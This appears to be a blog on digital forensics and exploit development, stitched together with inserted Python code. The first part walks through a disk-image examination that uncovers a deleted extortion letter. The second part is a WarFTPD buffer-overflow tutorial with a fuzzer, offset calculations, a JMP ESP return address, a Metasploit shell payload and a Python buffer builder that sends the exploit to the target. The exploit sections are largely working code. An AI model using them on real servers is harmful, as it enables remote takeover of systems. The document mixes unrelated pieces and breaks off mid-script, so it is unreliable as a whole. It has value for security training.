drwxr-xr-x 2 root root    512 2000-09-23 15:21 .
drwxr-xr-x 4 root root   7168 1970-01-01 07:00 ..
-rwxr-xr-x 1 root root 183654 2000-09-21 07:45 bike2.jpg
-rwxr-xr-x 1 root root 187598 2000-09-21 07:45 bike3.jpg
-rwxr-xr-x 1 root root  94426 2000-03-19 19:00 C800x600.jpg
-rwxr-xr-x 1 root root  27990 2000-09-21 07:45 matrixs3.jpg
-rwxr-xr-x 1 root root 418582 2000-09-21 07:45 mulewheelie.gif
-rwxr-xr-x 1 root root 243245 2000-09-21 07:45 Stoppie.gif

root@bt:/mnt/analysis# ls -laiRtu > ~/evid/access_file.list
root@bt:/mnt/analysis# find . -type f > ~/evid/file.list.2
root@bt:/mnt/analysis# tree
.
├── ARP.EXE
├── Docs
│   ├── Benchmarks.xls
│   ├── Computer_Build.xml
│   ├── Law.doc
│   ├── Private
│   └── whyhack
├── FTP.EXE
├── loveletter.virus
├── ouchy.dat
├── Pics
│   ├── bike2.jpg
│   ├── bike3.jpg
│   ├── C800x600.jpg
│   ├── matrixs3.jpg
│   ├── mulewheelie.gif
│   └── Stoppie.gif
└── snoof.gz

3 directories, 15 files

root@bt:/mnt/analysis# grep -i jpg ~/evid/file.list.2
./Pics/C800x600.jpg
./Pics/bike2.jpg
./Pics/bike3.jpg
./Pics/matrixs3.jpg

root@bt:/mnt/analysis# find . -type f -exec file {} \; > ~/evid/filetype.list
root@bt:/mnt/analysis# cat ~/evid/filetype.list
./Docs/Benchmarks.xls: CDF V2 Document, Little Endian, Os: Windows, Version 4.10, Code page: 1252, Author: Barry J. Grundy, Last Saved By: Barry J. Grundy, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jan  8 19:53:35 1999, Security: 0
./Docs/Computer_Build.xml: gzip compressed data, from Unix
./Docs/Law.doc: CDF V2 Document, Little Endian, Os: Windows, Version 4.0, Code page: 1252, Title: The Long Arm of the Law, Author: OAG, Template: Normal.dot, Last Saved By: OAG, Revision Number: 2, Name of Creating Application: Microsoft Word 8.0, Total Editing Time: 01:00, Create Time/Date: Wed Sep 20 12:16:00 2000, Last Saved Time/Date: Wed Sep 20 12:16:00 2000, Number of Pages: 1, Number of Words: 1335, Number of Characters: 7610, Security: 0
./Docs/whyhack: ASCII English text, with very long lines, with CRLF, LF line terminators
./Pics/C800x600.jpg: JPEG image data, JFIF standard 1.02
./Pics/bike2.jpg: PC bitmap, Windows 3.x format, 300 x 204 x 24
./Pics/bike3.jpg: PC bitmap, Windows 3.x format, 317 x 197 x 24
./Pics/matrixs3.jpg: JPEG image data, JFIF standard 1.01
./Pics/mulewheelie.gif: PC bitmap, Windows 3.x format, 425 x 328 x 24
./Pics/Stoppie.gif: GIF image data, version 87a, 1024 x 693
./ARP.EXE: PE32 executable for MS Windows (console) Intel 80386 32-bit
./FTP.EXE: PE32 executable for MS Windows (console) Intel 80386 32-bit
./loveletter.virus: ASCII English text
./ouchy.dat: JPEG image data, JFIF standard 1.02
./snoof.gz: gzip compressed data, from Unix, last modified: Thu Feb 11 03:04:46 1999

root@bt:/mnt/analysis# grep image ~/evid/filetype.list
./Pics/C800x600.jpg: JPEG image data, JFIF standard 1.02
./Pics/matrixs3.jpg: JPEG image data, JFIF standard 1.01
./Pics/Stoppie.gif: GIF image data, version 87a, 1024 x 693
./ouchy.dat: JPEG image data, JFIF standard 1.02
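The file listing above shows why `file` is worth running on every file: bike2.jpg and bike3.jpg are really Windows bitmaps, and ouchy.dat is a JPEG. As an added example (my own code, not the `file` utility and not part of this post), here is a header-signature identifier that does the same kind of check for a handful of formats and flags names whose extension disagrees with the content. The signature table, the extension-to-type mapping and the sample byte strings are all constructed for the demo; the sample names reuse the file names from the listing, but their contents are made up.

```python
# Added example: identify files from their header bytes, the way `file` does,
# and flag extension/content mismatches. The signature table below is a small
# constructed subset, and every sample byte string is made up for the demo.
from typing import Dict, List, Optional, Tuple

# (description, offset, magic bytes)
SIGNATURES: List[Tuple[str, int, bytes]] = [
    ("JPEG image data", 0, b"\xff\xd8\xff"),
    ("GIF image data, version 87a", 0, b"GIF87a"),
    ("GIF image data, version 89a", 0, b"GIF89a"),
    ("PC bitmap, Windows 3.x format", 0, b"BM"),
    ("gzip compressed data", 0, b"\x1f\x8b"),
    ("CDF V2 Document", 0, b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"),
    ("MS-DOS/Windows executable", 0, b"MZ"),
]

# What an extension is expected to identify as (constructed mapping; the check
# is "expected substring appears in the identification").
EXPECTED_BY_EXT: Dict[str, str] = {
    "jpg": "JPEG image data",
    "gif": "GIF image data",
    "gz": "gzip compressed data",
    "xls": "CDF V2 Document",
    "doc": "CDF V2 Document",
    "exe": "executable",
}


def identify(data: bytes) -> str:
    """Return a description from the first matching signature, else a text/data guess."""
    for description, offset, magic in SIGNATURES:
        if data[offset:offset + len(magic)] == magic:
            if magic == b"MZ" and len(data) >= 0x40:
                # e_lfanew at 0x3c points at the PE header, as in the ARP.EXE result above.
                pe_off = int.from_bytes(data[0x3c:0x40], "little")
                if data[pe_off:pe_off + 4] == b"PE\x00\x00":
                    return "PE32 executable for MS Windows"
            return description
    if data and all(32 <= b < 127 or b in (9, 10, 13) for b in data):
        return "ASCII text"
    return "data"


def extension_mismatch(name: str, data: bytes) -> Optional[str]:
    """A note when the name promises one type and the header says another."""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    found = identify(data)
    expected = EXPECTED_BY_EXT.get(ext)
    if expected is None:
        # Unknown extension carrying a recognisable binary format (the ouchy.dat case).
        if found in ("data", "ASCII text"):
            return None
        return f"{name}: .{ext} is not a known extension for {found}"
    if expected in found:
        return None
    return f"{name}: extension .{ext} but header says {found}"


def scan(files: Dict[str, bytes]) -> Dict[str, Tuple[str, Optional[str]]]:
    """Identify every file and attach a mismatch note where there is one."""
    return {name: (identify(data), extension_mismatch(name, data)) for name, data in files.items()}


def mismatches(files: Dict[str, bytes]) -> List[str]:
    return [note for _type, note in scan(files).values() if note]


# Constructed minimal PE image: MZ stub, e_lfanew = 0x40, "PE\0\0" at 0x40.
PE_SAMPLE = b"MZ" + b"\x00" * (0x3c - 2) + (0x40).to_bytes(4, "little") + b"PE\x00\x00" + b"\x00" * 16

# Constructed sample contents; the names echo the listing above, the bytes do not.
SAMPLE_FILES: Dict[str, bytes] = {
    "Pics/C800x600.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00",
    "Pics/bike2.jpg": b"BM" + b"\x00" * 30,              # a bitmap wearing a .jpg name
    "Pics/Stoppie.gif": b"GIF87a" + b"\x00" * 10,
    "ouchy.dat": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00",    # a JPEG hidden as .dat
    "snoof.gz": b"\x1f\x8b\x08" + b"\x00" * 8,
    "ARP.EXE": PE_SAMPLE,
    "loveletter.virus": b"constructed plain text\r\n",
}


if __name__ == "__main__":
    for name, (kind, note) in scan(SAMPLE_FILES).items():
        print(f"{name}: {kind}" + (f"  <-- {note}" if note else ""))
```

The real `file` command uses a much larger magic database and looks at more than the first few bytes, so treat this as the idea rather than a replacement; the point is that the extension is never the evidence, the header is.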

root@bt:strings arp.exe | less
 l|}
<-t8</t4
t]Ph
t2Ph '
Ph!'
@SVW
wR9U
wM9U
wH9U
SVWj
)h|I
L$ 3
L$ 3
u!Wj
L$ 3
\VSW
KERNEL32.dll
CharToOemA
USER32.dll
%u.%u.%u.%u
-%02x
%02x
%2x-%2x-%2x-%2x-%2x-%2x
SnmpExtensionQuery
SnmpExtensionInit
inetmib1.dll
%1: bad IP address: %2
%1: bad argument: %2
Interface: %1
  Internet Address      Physical Address      Type
%1: not enough memory
other%0
invalid%0
dynamic%0
static%0
%1: Windows Sockets initialization failed: %2!d!
%1: can't load DLL: %2, error = %3!d!
%1: DLL error %3!d! in %2
The specified entry was not found
  %1!-20s!  %2!-20s!  %3!-10s!
The interface failed to initialize: %1!u!
Unable to retrieve ARP information: %1!u!
The ARP entry addition failed: %1!u!
The ARP entry deletion failed: %1!u!
No ARP Entries Found
151J1Q1v3
7+8}8
>B>`>w>
#0a0
0d1w1
2*222L2
3r3y3
4(4.4
5$5+52595@5G5N5U5\5
6&8-8B8I8[8b8q8u8y8}8
:#:':+:/:3:7:;:?:C:G:K:O:S:W:[:_:c:g:k:o:
<e=i=m=q=u=y=}=
0f2/33373;3?3C3G3K3O3S3\7a7g7t7
7 8&8,82888>8D8J8P8V8\8b8h8D9J9P9V9

root@bt:~# umount /mnt/analysis
umount: /mnt/analysis: device is busy.
        (In some cases useful info about processes that use
         the device is found by lsof(8) or fuser(1))

root@bt:~/evid# nano /root/evid/searchlist.txt/hits.txt
root@bt:~/evid# ls -l
total 1024192
-rw-r--r-- 1 root root       1630 2012-10-30 21:51 access_file.list
-rw-r--r-- 1 root root        927 2012-10-30 20:28 fdisk.disk1
-rw-r--r-- 1 root root        256 2012-10-30 21:52 file.list.2
-rw-r--r-- 1 root root       1544 2012-10-30 21:57 filetype.list
-r--r--r-- 1 root root    1474560 2012-10-30 21:06 image.disk1
-rw-r--r-- 1 root root 1047263232 2012-10-30 21:15 image.disk2
drwxr-xr-x 2 root root       4096 2012-10-30 20:00 searchlist.txt
-rw-r--r-- 1 root root         51 2012-10-30 21:32 sha.disk1
-rw-r--r-- 1 root root        886 2012-10-30 21:35 sha.filelist
root@bt:~/evid# nano searchlist


root@bt:~/evid# grep -abif searchlist.txt image.disk1 > hits.txt

root@bt:~/evid# cat hits.txt

8983:�*�J�j��������ADocs`����������������DOCS       ��z7)7)�z7)APics`����������������PICS       ��z7)7)�z7)vARP     EXE ��z7)7)eY▒!K    PLFTP     EXE $�z7)7)eY▒!r      ��Brus�������������������lovel�etter.viLOVELE~1VIR��z7)7)�=5)�  !?Aouchy�.dat������OUCHY   DAT ��z7)7)▒�s(�     SAsnoof�.gz��������SNOOF   GZ  ��z7)7)s=)
39284:Ninth Circuit Strikes Federal �Virtual� Child Pornography Law on First Amendment Grounds
                      INCLUDEPICTURE  \d "/images/design/5x5.gif"

                                                                INCLUDEPICTURE  \d "/images/design/5x5.gif"
                                  INCLUDEPICTURE  \d "/images/design/5x5.gif"
    INCLUDEPICTURE  \d "/images/design/5x5.gif"
                                              HYPERLINK "mailto:info@lawnewsnetwork.com"mailto:info@lawnewsnetwork.com
                                              HYPERLINK "http://www.almdc.com/"Criminal Justice Weekly
                               December 21, 1999
                                                 INCLUDEPICTURE  \d "/images/design/5x5.gif"
                   INCLUDEPICTURE  \d "/images/design/line2.gif"
                                                               INCLUDEPIThe First Amendment prohibits Congress from enacting a statute criminalizing the generation of computer images of fictitious children engaged in imaginary but explicit sexual conduct, the U.S. Court of Appeals for the Ninth Circuit held Dec. 17, widening a split in the circuits. Specifically, the court struck certain language in the Child Pornography Prevention Act of 1996, 18 U.S.C. �2256, prohibiting a "visual depiction" that "is, or appears to be, of a minor engaging in sexually explicit conduct," and advertising or promotion of such images, as unconstitutionally vague and overbroad, language which was found last month to be constitutional by the Eleventh Circuit in U.S. v. Acheson, 11th Cir., No. 98-3559, Story, J., 11/12/99 (Free Speech Coalition v. Reno, 9th Cir., No. 97-1653Section 2256(8) defines child pornography as "any visual depiction, including any photograph, film, video, picture, or computer or computer-generated image or picture, whether made or produced by electronic, mechanical, or other means, of sexually explicit conduct[.]" At issue in the appeal were the definitions contained in subsections (B) and (D). Section 2256(8)(B) bans sexually explicit depictions that appear to be minors. Section 2256(8)(D) bans visual depictions that are "advertised, promoted, presented, described or distributed in such a manner that conveys the imThe plaintiffs were a group of adult-oriented businesses and erotic artists who withheld or stopped distributing certain artistic works out of fear of prosecution under the 1996 amendments. The district court found that the plaintiffs had standing to bring their First Amendment challenge, and the government did not contest that finding on appeal. The district court granted summary judgment in favor of the government on the First Amendment issues, however. 
On appeal, the plaintiffs argue that where the statute fails to define "appears to be" and "conveys the impression," it is so vague a person of ordinary intelligence cannot understand whatThe Ninth Circuit, in an opinion by U.S. District Judge Donald W. Molloy (D. Mont.), sitting by designation, agreed on that point, while holding most of the statute still passes constitutional muster. However, it did not hold, as the dissent claimed, that the First Amendment protects all computer-generated imaginary images of child pornography. "Because the statute is severable, our holding demonstrates that if morphed computer images are of an identifiable child, the statute is enforceable because there is then the potential harm to a real child."
CONTENT DISCRIMINATION
844548426:         <dc:format>image/jpeg</dc:format>
845713864:         <dc:format>image/jpeg</dc:format>
846648084:         <dc:format>image/jpeg</dc:format>
Project managers may still need to break the rules to meet project goals, and senior managers must support those actions�T�
853499180:��▒�Rectangle 3������
Business Service Management (BSM) tools track the execution of business process flows�ZRd information
853567991:Concourse
                   1_Concourse
                              2_Concourse
                                         3_Concourse
                                                    4_Concourse
                                                               5_Concourse
                                                                          6_Concourse
                                                                                     7_Concourse
                                                                                                8_Concourse
                                                                                                           9_Concourse*Chapter 4: Project Integration ManagementLearning Objectives Learning Objectives (continued) Learning Objectives (continued)HThe Key to Overall Project Success: Good Project Integration Management)Project Integration Management Processes5Project Integration Management Processes (continued)3Figure 4-1. Project Integration Management SummaryWhat Went Wrong?)Strategic Planning and Project SelectionLFigure 4-2. Mind Map of a SWOT Analysis to Help Identify Potential Projects4Figure 4-3. Information Technology Planning ProcessBest PracticeMethods for Selecting Projects'Focusing on Broad Organizational NeedsCategorizing IT ProjectsFinancial Analysis of Projectset Present Value Analysis&Figure 4-4. Net Present Value Example'Figure 4-5. JWD Consulting NPV ExampleNPV CalculationsReturn on InvestmentPayback Analysis(Figure 4-6. Charting the Payback PeriodWeighted Scoring Model@Figure 4-7. Sample Weighted Scoring Model for Project Selection"Implementing a Balanced Scorecard'Figure 4-8. Balanced Scorecard ExampleProject ChartersXTable 4-1. Contoh Project Charter for the DNA-Sequencing Instrument Completion Project Table 4-1. Charter (continued)Project Management Plans-Common Elements of a Project Management PlanITable 4-2. Sample Contents for a Software Project Management Plan (SPMP)What the Winners DoProject Execution$Coordinating Planning and Execution.Providing Leadership and a Supportive Culture'Important Skills for Project Execution'Project Execution Tools and Techniques(Monitoring and Controlling Project WorkMedia Snapshot▒Integrated Change Control2Change Control on Information Technology ProjectsChange Control Systemhange Control Board (CCB)Making Timely ChangesConfiguration Management@Table 4-3. Suggestions for Performing Integrated Change ControlClosing Projects and Phases;Using Software to Assist in Project Integration ManagementChapter Summary

                                                                                                                     Fonts UseTheme
root@bt:~/evid# xxd -s 75441 image.disk1 | less

00126b1: 796f 7520 616e 6420 796f 7572 2065 6e74  you and your ent
00126c1: 6972 6520 6275 7369 6e65 7373 2072 616e  ire business ran
00126d1: 736f 6d2e 0a0a 5468 6973 2069 7320 6e6f  som...This is no
00126e1: 7420 6120 6a6f 6b65 2e0a 0a49 2068 6176  t a joke...I hav
00126f1: 6520 6861 6420 656e 6f75 6768 206f 6620  e had enough of 
0012701: 796f 7572 206d 696e 646c 6573 7320 636f  your mindless co
0012711: 7270 6f72 6174 6520 7069 7261 6379 2061  rporate piracy a
0012721: 6e64 2077 696c 6c20 6e6f 206c 6f6e 6765  nd will no longe
0012731: 7220 7374 616e 6420 666f 7220 6974 2e20  r stand for it. 
0012741: 596f 7520 7769 6c6c 2072 6563 6965 7665  You will recieve
0012751: 2061 6e6f 7468 6572 206c 6574 7465 7220   another letter 
0012761: 6e65 7874 2077 6565 6b2e 2020 4974 2077  next week.  It w
0012771: 696c 6c20 6861 7665 2061 2073 696e 676c  ill have a singl
0012781: 6520 6261 6e6b 2061 6363 6f75 6e74 206e  e bank account n
0012791: 756d 6265 7220 616e 6420 6261 6e6b 206e  umber and bank n
00127a1: 616d 652e 2020 4920 7761 6e74 2079 6f75  ame.  I want you
00127b1: 2074 6f20 6465 706f 7369 7420 2435 302c   to deposit $50,
00127c1: 3030 3020 696e 2074 6865 2061 6363 6f75  000 in the accou
00127d1: 6e74 2074 6865 2064 6179 2079 6f75 2072  nt the day you r
00127e1: 6563 6569 7665 2074 6865 206c 6574 7465  eceive the lette
00127f1: 722e 2020 0a0a 446f 6e27 7420 7472 7920  r.  ..Don't try 
0012801: 616e 7974 6869 6e67 2c20 616e 6420 646f  anything, and do
0012811: 6e74 2063 6f6e 7461 6374 2074 6865 2063  nt contact the c
0012821: 6f70 732e 2020 4966 2079 6f75 2064 6f2c  ops.  If you do,
0012831: 2049 2077 696c 6c20 756e 6c65 6173 6820   I will unleash 
0012841: 6120 7669 7275 7320 7468 6174 2077 696c  a virus that wil
0012851: 6c20 6272 696e 6720 646f 776e 2079 6f75  l bring down you
0012861: 7220 7768 6f6c 6520 6e65 7477 6f72 6b20  r whole network 
(output continues)

Thursday, October 25, 2012

What is meant by computer forensics

Computer forensics, also known as digital forensics, is the branch of forensic science concerned with legal evidence found in computers and digital storage media.

The goal of computer forensics is to explain the current state of a digital artifact. A digital artifact can be a computer system, a storage medium (such as a flash drive, hard disk or CD-ROM), an electronic document (such as an e-mail message or a JPEG image), or even a sequence of packets travelling across a computer network. The explanation can be as simple as "is there information here?" or as elaborate as "what sequence of events led to the current state?".

Computer forensics is also used to combat corruption and fraud in cyberspace (the Internet). Such investigations acquire electronic data and analyse it for use in court as evidence; to be admissible, the data records must not undergo the slightest change from the condition in which they were found. If the data is altered it can no longer be used in court (it is no longer authentic).

Computer forensics is used, for example, to:

1. look for evidence of fraud or corruption committed by employees;
2. analyse a computer system that has been compromised by hackers: how they gained access and what they did;
3. recover data that was lost, intentionally or not, even after a hard disk has been formatted or reused by someone else.

To be submitted as electronic evidence in court, the results of computer forensics should:

1. meet certain standards, namely being (1) admissible, (2) authentic, (3) complete, (4) believable and (5) reliable;
2. come from computer forensics tools with a validated methodology (who knows whether a tool merely claims to be validated and is in fact bogus);
3. have the electronic storage media clearly documented under a 'chain of custody' from the initial seizure until they are finally submitted to the court;
4. in general, be obtained by examining the electronic storage media only with the owner's permission (a written 'letter of consent'), unless the examination is carried out under legal authority (in Indonesia: the Attorney General's Office, the police or the KPK).

In computer forensics, data acquisition is known as 'computer forensic imaging': an exact copy of the suspect's hard drive is made, including deleted data and the technical areas of the drive that the operating system cannot read.

The software used in computer forensics is forensic imaging software, whose purpose is to make an identical copy of the electronic data on the target. So that the original data is not altered during imaging, the electronic storage medium is 'write blocked'. The hardware and software are purpose-built to keep the data intact (unchanged) and can even recover files that have been deleted. The aim is to find evidence against the perpetrators of corruption and fraud.

Some of the vendors that provide computer forensics technology are Paraben, Guidance Software (EnCase), GetData (Mount Image), etc.

Searching Unallocated and Slack Space for Text

Now let's go back to the original image. The restored disk (or loop-mounted disk image) allowed you to check all the files and directories (logical view). What about unallocated and slack space (physical view)? We will now analyze the image itself, since it is a bit-for-bit copy and includes data in the unallocated areas of the disk.

Let's assume that we have seized this disk from a former employee of a large corporation. The would-be cracker sent a letter to the corporation threatening to unleash a virus in their network. The suspect denies sending the letter. This is a simple matter of finding the text from a deleted file (unallocated space).
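The keyword search the exercise runs above (grep -abif searchlist.txt image.disk1, then xxd -s 75441 image.disk1 to look at a hit) done in Python, as an added example that is not part of the original post or of the exercise's own tooling. It reports the byte offset of the match itself (grep -b without -o reports the offset of the start of the matching "line", which in a raw image with few newlines can lie well before the match), the 512-byte sector that holds it, and some surrounding bytes rendered like the right-hand column of xxd. The image is read in chunks with an overlap, so an image the size of image.disk2 never has to fit in memory and a keyword straddling a chunk boundary is still found. The 512-byte sector size, the chunk size, the search_bytes helper and the sample data in the usage are assumptions.

```python
"""Keyword search over a raw disk image, reporting byte offsets and sectors."""
import io
import re
from typing import BinaryIO, Iterator, List, NamedTuple, Union


class Hit(NamedTuple):
    offset: int     # byte offset of the match itself (what xxd -s wants)
    sector: int     # offset // sector_size, for dd skip= or block-layer tools
    keyword: bytes  # the matched text exactly as it sits in the image
    context: bytes  # bytes around the match, for a quick eyeball check


def compile_keywords(keywords: List[str]) -> "re.Pattern[bytes]":
    """One case-insensitive bytes regex from a searchlist (one keyword per
    entry). Keywords are escaped, so they are literal strings, not regexes.
    Assumption: the list is ASCII/latin-1, like the exercise's searchlist."""
    alternation = b"|".join(re.escape(k.encode("latin-1")) for k in keywords)
    return re.compile(alternation, re.IGNORECASE)


def iter_hits(source: Union[str, BinaryIO], keywords: List[str],
              sector_size: int = 512, chunk_size: int = 4 * 1024 * 1024,
              context: int = 24) -> Iterator[Hit]:
    """Scan the image chunk by chunk so it never has to fit in memory.

    Each chunk is searched together with the last (longest keyword - 1) bytes
    of the previous chunk, so a match straddling a chunk boundary is still
    found; a match that ends inside that overlap was already reported from
    the previous chunk and is skipped."""
    if not keywords:
        return
    pattern = compile_keywords(keywords)
    tail_len = max(len(k) for k in keywords) - 1
    img = open(source, "rb") if isinstance(source, str) else source
    tail = b""
    base = 0  # image offset of buf[0]
    try:
        while True:
            chunk = img.read(chunk_size)
            if not chunk:
                return
            buf = tail + chunk
            for m in pattern.finditer(buf):
                if m.end() <= len(tail):
                    continue  # fully inside the overlap: already reported
                off = base + m.start()
                lo, hi = max(0, m.start() - context), min(len(buf), m.end() + context)
                yield Hit(off, off // sector_size, m.group(0), buf[lo:hi])
            tail = buf[-tail_len:] if tail_len else b""
            base += len(buf) - len(tail)
    finally:
        if isinstance(source, str):
            img.close()


def search_bytes(data: bytes, keywords: List[str], **kw) -> List[Hit]:
    """Search an in-memory buffer (a blkls extract, a carved block) the same way."""
    return list(iter_hits(io.BytesIO(data), keywords, **kw))


def printable(data: bytes) -> str:
    """Render bytes like the right-hand column of xxd: non-printables as '.'."""
    return "".join(chr(b) if 32 <= b < 127 else "." for b in data)


if __name__ == "__main__":
    import sys
    if len(sys.argv) != 3:
        sys.exit("usage: search_image.py IMAGE SEARCHLIST")
    with open(sys.argv[2], encoding="latin-1") as f:
        words = [line.strip() for line in f if line.strip()]
    # one line per hit: offset:sector:keyword:context, ready for xxd -s <offset>
    for hit in iter_hits(sys.argv[1], words):
        print(f"{hit.offset}:{hit.sector}:{printable(hit.keyword)}:{printable(hit.context)}")
```

Run it as search_image.py image.disk1 searchlist.txt and feed an offset from the output to xxd -s, as the exercise does; sector * 512 gives the dd skip= value for carving the surrounding block.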

Sunday, October 7, 2012

Buffer Overflow with a Fuzzer and Fuzzing, using WarFTPD & OllyDbg

Buffer Overflow
A buffer overflow is what happens in a computer's memory system when, during the normal process of storing temporary data in memory, more data is written than the buffer (the temporary storage) has capacity for.

FUZZER
The word "fuzzer" is used widely in science and technology, fuzzy logic being one example, but the fuzzer discussed here has nothing to do with fuzzy logic: a fuzzer is the name for an application used in the process of fuzzing.

FUZZING
Fuzzing is an early step that a security researcher is sure to perform: an application is fed abnormal data so that we can see how the application handles that data and how it performs its error handling. From this process the researcher can see whether there is a security gap in the application that can be exploited.

Tools
The tools that will be used are as follows:
* OllyDbg, as the debugger
* a fuzzer, to do the fuzzing
* Python, used to write the fuzzer and the exploit

WarFTPD
The application used as the target is WarFTPD, written by Jarle (jgaa) Aase. It is an FTP server application that runs on the Windows operating system, as seen in the image below:


Since the application to be exploited is an FTP server, I am trying here to write a simple fuzzer that can send data over the FTP protocol. The fuzzer is written in Python.

as the example below:
#!/usr/bin/python
import socket

# 1000 bytes of 'A' (0x41) sent as the USER argument to overflow WarFTPD's buffer
buffer = "\x41" * 1000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.56.101', 21))        # the WarFTPD host in the VirtualBox VM
data = s.recv(1024)                      # read the FTP banner
print("sending evil data via USER command...")
# FTP commands end with CRLF ("\r\n", not "\r \n"); .encode() works on Python 2 and 3
s.send(('USER ' + buffer + '\r\n').encode())
data = s.recv(1024)
s.send(('PASS PASSWORD' + '\r\n').encode())
s.close()
print("Finish")

To run the WarFTP server, open the Properties menu and start the service; the status of WarFTP becomes idle. To check that the server is running and can be reached from the BackTrack system, try connecting to the FTP port with nc (netcat), running the following command:



The next step is to run the fuzzer from the command line. Make sure the VirtualBox window from before is clearly visible; the goal is to see what happens to the WarFTP server application.
root@bt:~# python BackTrack.py






This time OllyDbg will also be used to debug the WarFTP server application.



So that OllyDbg can see what happens when the application crashes, run the WarFTP server through OllyDbg. When WarFTP is started under OllyDbg, an error message appears. To keep that error from appearing again during exploit development, follow these steps:

* delete the FtpDaemon file;
* run the WarFTP server application again;
* create a dummy user through User Security.


Run WarFTP again; when it runs normally without showing the error message, run the WarFTP server application through OllyDbg.



It will then appear as follows:






Let's go. Now, in the Konsole application on BackTrack, go into the folder as follows:
#cd /opt/metasploit/msf3/tools/

pattern_create.rb is in this folder. Run it to generate 1000 bytes of data, like this:
./pattern_create.rb 1000 > string_pattern.txt


Look at the string of 1000 characters, starting with "Aa0Aa1Aa2Aa3A" and ending with "Bh0Bh1Bh2B". After the string pattern has been created, the next step is to put this data into the fuzzer written earlier: the pattern replaces the "A" data in the fuzzer. Use a text editor to modify the fuzzer script.




After the fuzzer has been changed to send the pattern generated by pattern_create.rb, continue with the next step: run the WarFTP server through OllyDbg.







Unlike before, the registers of the WarFTP server process are now filled with the string pattern that was put into the fuzzer; note the data in the registers. Now use pattern_offset.rb to calculate how many bytes from the start of the pattern the string found in each register lies. In the console do as below:
#./pattern_offset.rb 32714131 -> the EIP value
485 -> EIP
It takes 485 bytes of data to reach EIP (0x32714131 read little-endian is the bytes "1Aq2", which start 485 bytes into the pattern).
#./pattern_offset.rb q4Aq5Aq -> the ESP value
493
-> reaching the stack (the data ESP points at) takes 493 bytes




Now continue by entering the fuzzer script below, and proceed as in the previous step.



Now look at the values shown in the stack and registers windows in OllyDbg: the value in the EIP register is DEADBEEF.





Run the application under OllyDbg and open View -> Executable modules; it will then appear as follows.



If it looks like the above, proceed to determine which library you want to use: double-click on the file name and it will appear as follows.
Now right-click in the main window: Search for -> Command.




Type JMP ESP in the window and press Find.




The address of JMP ESP then appears; on my system it is 7E429353, as follows:


The next thing to do is convert the address to little-endian format, from 7E429353 to \x53\x93\x42\x7E; note the following script:





Now run WarFTP under OllyDbg again as before; it will appear as follows:




Run WarFTP under OllyDbg again as before, right-click the selected address and choose Breakpoint -> Memory, on access.
Next, in the console, run ./msfweb.




Now we move on to the payload. Choose the payload to build next; Metasploit displays the configuration menu for the chosen shell payload type, as shown in the following figure. After finishing, don't forget to press Generate to generate the selected payload:



Now insert the payload code into the script used previously, as follows:



Now run WarFTP under OllyDbg again as before. If there is no error, run # telnet 192.168.56.101 4444 and the following happens:
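The offset arithmetic and buffer layout of the steps above, as an added example; this is not the post's fuzzer, not pattern_create.rb/pattern_offset.rb and not Metasploit's code. pattern_create produces the same <upper><lower><digit> cycle as pattern_create.rb; pattern_offset takes either the EIP value as OllyDbg shows it (0x32714131, which on little-endian x86 means the bytes "1Aq2" overwrote the saved return address) or the text seen at ESP ("q4Aq5Aq"); build_buffer puts a return address at the EIP offset and a NOP sled plus shellcode where ESP points, so 0xDEADBEEF reproduces the control check and 0x7E429353 (the JMP ESP found above) redirects execution; ftp_user_command frames the buffer as the fuzzer did and rejects the bytes that would cut the USER argument short. The int3 placeholder shellcode (standing in for the payload generated with msfweb), the 'C' filler, the function names and the --send flag are assumptions; the host, port, offsets and addresses are the post's.

```python
"""WarFTPD USER overflow: pattern arithmetic and buffer layout."""
import socket
import string
import struct
from typing import Union

HOST, PORT = "192.168.56.101", 21   # the post's target VM and FTP port
JMP_ESP = 0x7E429353                # JMP ESP address found in OllyDbg in the post
EIP_OFFSET = 485                    # pattern_offset.rb 32714131
ESP_OFFSET = 493                    # pattern_offset.rb q4Aq5Aq


def pattern_create(length: int) -> bytes:
    """Same layout as pattern_create.rb: 3-byte groups <upper><lower><digit>,
    Aa0 Aa1 ... Zz9. One cycle is 26*26*10*3 = 20280 bytes; like the
    Metasploit tool this wraps around for longer patterns, so offsets above
    20280 are ambiguous."""
    out = bytearray()
    while len(out) < length:
        for upper in string.ascii_uppercase:
            for lower in string.ascii_lowercase:
                for digit in string.digits:
                    out += f"{upper}{lower}{digit}".encode()
                    if len(out) >= length:
                        return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(pattern: bytes, value: Union[int, str, bytes]) -> int:
    """Offset of a register value inside the pattern, or -1 if absent.
    An int is the value as OllyDbg displays it (0x32714131); x86 is
    little-endian, so the bytes in memory were the reverse, b"1Aq2".
    A str or bytes (the text seen at ESP, "q4Aq5Aq") is looked up as-is."""
    if isinstance(value, int):
        needle = struct.pack("<I", value)
    elif isinstance(value, str):
        needle = value.encode()
    else:
        needle = value
    return pattern.find(needle)


def build_buffer(shellcode: bytes, ret: int = JMP_ESP, eip_offset: int = EIP_OFFSET,
                 esp_offset: int = ESP_OFFSET, nops: int = 16, total: int = 1000) -> bytes:
    """filler | ret (little-endian) | pad up to ESP | NOP sled | shellcode | filler.
    ret=0xDEADBEEF reproduces the post's control check (EIP reads DEADBEEF);
    ret=JMP_ESP jumps into the sled that ESP points at."""
    gap = esp_offset - (eip_offset + 4)
    if gap < 0:
        raise ValueError("ESP must point past the overwritten return address")
    buf = b"A" * eip_offset + struct.pack("<I", ret) + b"\x90" * (gap + nops) + shellcode
    if len(buf) < total:
        buf += b"C" * (total - len(buf))   # keep the length that crashed the fuzzer
    return buf


def ftp_user_command(buf: bytes) -> bytes:
    """Frame the buffer as the fuzzer did. 0x00 ends the C string on the server
    and 0x0a/0x0d end the FTP command line, so none of them may appear."""
    found = sorted(b for b in set(buf) if b in (0x00, 0x0A, 0x0D))
    if found:
        raise ValueError("bad characters in buffer: " + ", ".join(f"0x{b:02x}" for b in found))
    return b"USER " + buf + b"\r\n"


def send_exploit(buf: bytes, host: str = HOST, port: int = PORT) -> None:
    """The fuzzer's exchange, with the finished buffer."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.recv(1024)                      # banner
        s.sendall(ftp_user_command(buf))  # WarFTPD dies here if the overflow works
        try:
            s.recv(1024)
        except OSError:
            pass


if __name__ == "__main__":
    import sys
    pat = pattern_create(1000)
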